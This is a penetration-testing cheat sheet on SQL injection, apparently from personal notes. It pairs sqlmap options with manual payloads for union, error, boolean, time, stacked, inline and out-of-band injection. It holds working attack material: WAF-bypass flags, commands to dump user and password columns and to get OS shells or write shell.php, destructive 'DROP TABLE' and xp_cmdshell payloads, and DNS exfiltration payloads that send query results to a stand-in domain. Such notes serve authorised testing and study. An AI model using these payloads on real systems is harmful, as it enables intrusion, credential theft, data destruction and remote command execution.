SQL Injection

See more about… SQL

Source: Docs > 2 - Pre-Engagement > checklist#sql

SQL

If these steps fail, the target is likely not vulnerable via automation.

Phase 1: Injection & Tuning

  • Manual Triage (Burp): Confirm “True” vs “False” response size manually. Never run SQLMap blind.
  • The Setup: Save request to req.txt. Mark injection point with *. (sqlmap -r req.txt --batch)
  • The Unlocker (Tuning): Logic (OR) or Brackets ()))) failing? (--level 5 --risk 3)
  • The Syntax Fix: SQLMap guessing wrong boundaries? (--prefix="')" - Match your Burp findings).
  • The Speedup: Time-based checks taking forever? (--technique=BEU - Force Boolean/Error/Union only).

Phase 2: Stability & Evasion

  • The Hallucination Fix: “2 letters off” or garbage data? (--string="SuccessMsg" or --text-only).
  • The Bypass: WAF blocking or 403s? (--random-agent --tamper=space2comment --skip-waf).

Phase 3: Loot & Shells

  • The Recon: Check privileges immediately. (--is-dba --current-db).
  • The Dump: Surgical extraction (Don’t dump the world). (-D <DB> -T <TABLE> -C <USER,PASS> --dump).
  • The Endgame (RCE): DBA is True? (--os-shell (Add --technique=E if empty) OR --file-write="shell.php").

Troubleshooting (Panic Modifiers) Add these to The Dump if injection exists but data fails to extract.

  • --union-cols=X: Manually set column count (if SQLMap counts wrong).
  • --no-cast: Disable payload casting (Fixes specific DB errors).
  • --hex: Encode data extraction (Bypasses WAF filters on output).

SQLMap supports techniques BEUSTQ: Boolean blind (B), Error-based (E), Union (U), Stacked (S), Time-based blind (T), Inline (Q), plus Out-of-band (OOB) via DNS exfiltration. Use sqlmap -hh to list techniques.

Union Based SQLi

Direct data extraction by combining results from two queries.

Mechanics:

  1. Find Column Count: ORDER BY 1, ORDER BY 2… until error.
  2. Find Visible Columns: UNION SELECT 1, 2, 3, 4 (Check which numbers appear on screen).
  3. Extract Data: Replace visible number with database(), user(), or column name.
-- Get column count... start at 2 and iterate up
' ORDER BY 2-- -
-- MORE ROBUST since it will error on bad column sizes
' UNION SELECT 1,2-- -

-- Get current user and database
' UNION SELECT 1, user(), database(), 4 -- -
' UNION SELECT 1, user, database(), 4 FROM mysql.user -- -

-- Enumeration
' UNION SELECT 1, group_concat(table_name), 3, 4 FROM information_schema.tables WHERE table_schema=database()-- -
See more about… Union-based

Source: Docs > 9 - Notes > sqlmap#union-based

Union-based

Combine two queries to dump data directly into the response. Count the displayed columns (and maybe iteratively increase columns amount)

sqlmap -u "<URL>" --technique=U --union-cols=5

Error Based SQLi

Force the database to dump data inside a verbose error message.

Mechanics: Intentionally break syntax or use functions that fail when passed specific strings, causing the DB to return the string (the flag) in the error.

-- MySQL (extractvalue)
' AND extractvalue(1, concat(0x7e, (SELECT @@version), 0x7e))-- -

-- MSSQL (Conversion Error)
' AND 1=(SELECT TOP 1 table_name FROM information_schema.tables)--
See more about… Error-based

Source: Docs > 9 - Notes > sqlmap#error-based

Error-based

Trigger DB errors that leak data inside the error message.

sqlmap -u "<URL>" --technique=E

Blind SQLi (Boolean)

Infer data by asking True/False questions. Content changes based on the answer.

Mechanics: If 1=1 (True) loads the page normally, and 1=2 (False) hides content, the target is vulnerable.

-- Verification
' AND 1=1-- -  (Page loads)
' AND 1=2-- -  (Content missing)

-- Data Extraction (Manual logic)
-- Is the first letter of user() 'a'?
' AND (SELECT substring(user(),1,1))='a'-- -
See more about… Blind Boolean

Source: Docs > 9 - Notes > sqlmap#blind-boolean

Blind Boolean

Infer data from whether the page content or behaviour changes (true vs false).

NOTE: careful this is a very unstable method that might require multiple runs or --no-cast

sqlmap -u "<URL>" --technique=B --level 5 --risk 3

Blind SQLi (Time)

Infer data by measuring response delay.

Mechanics: If the condition is True, the database sleeps. If the page takes ~10s to load, the injection succeeded.

-- MySQL
' AND (SELECT SLEEP(5))-- -

-- MSSQL
'; WAITFOR DELAY '0:0:5'--

-- PostgreSQL
'; SELECT pg_sleep(5)--
See more about… Blind Time

Source: Docs > 9 - Notes > sqlmap#blind-time

Blind Time

Infer data from response delays (e.g. SLEEP) when the condition is true.

sqlmap -u "<URL>" --technique=T

Stacked Queries SQLi

Append additional SQL statements after the vulnerable query (e.g. non-query statements or OS commands).

Mechanics: “Piggy-backing” — inject a second statement after the first (e.g. ; DROP TABLE users). Only works when the DB and driver allow multiple statements (e.g. MSSQL, PostgreSQL). SQLMap can use it for data retrieval (similar to time-based) or for non-query/OS execution when supported.

-- Example: second statement runs after the first
'; DROP TABLE users-- -
'; EXEC xp_cmdshell 'whoami'-- -
See more about… Stacked queries

Source: Docs > 9 - Notes > sqlmap#stacked-queries

Stacked queries

Append extra SQL statements after the vulnerable one (e.g. INSERT/UPDATE/DELETE or OS commands); requires DB support (e.g. MSSQL, PostgreSQL).

sqlmap -u "<URL>" --technique=S

Inline Queries SQLi

Embed a subquery inside the original query so the result is used in place.

Mechanics: The vulnerable app must use the result of a subquery in a way that lets you inject (e.g. SELECT (SELECT @@version) FROM ...). Less common than other types because the code structure has to match. SQLMap supports it when the injection point allows embedded queries.

-- Example: version in a subquery
SELECT (SELECT @@version) FROM ...
See more about… Inline queries

Source: Docs > 9 - Notes > sqlmap#inline-queries

Inline queries

Query embedded inside the original query; uncommon and app-dependent.

sqlmap -u "<URL>" --technique=Q

Out-of-Band (OOB) SQLi

Exfiltrate data via DNS/HTTP requests when output is completely invisible.

Mechanics: Force the DB to resolve a domain you control (interactsh). The data is prepended as the subdomain.

# 1. Start Listener
interactsh-client

# 2. Payload Construction (example domain: domain.com)
# Windows / MSSQL (xp_dirtree)
'; DECLARE @data varchar(1024); SELECT @data = (SELECT user_name()); EXEC('master..xp_dirtree "\\'+@data+'.domain.com\a"');--

# Linux / MySQL (secure_file_priv must be empty)
' SELECT LOAD_FILE(CONCAT('\\\\', (SELECT user()), '.domain.com\\a'))-- -
See more about… Out-of-band

Source: Docs > 9 - Notes > sqlmap#out-of-band

Out-of-band

Exfiltrate via DNS or HTTP to a server you control when no output is visible.

sqlmap -u "<URL>" --dns-domain=<DOMAIN>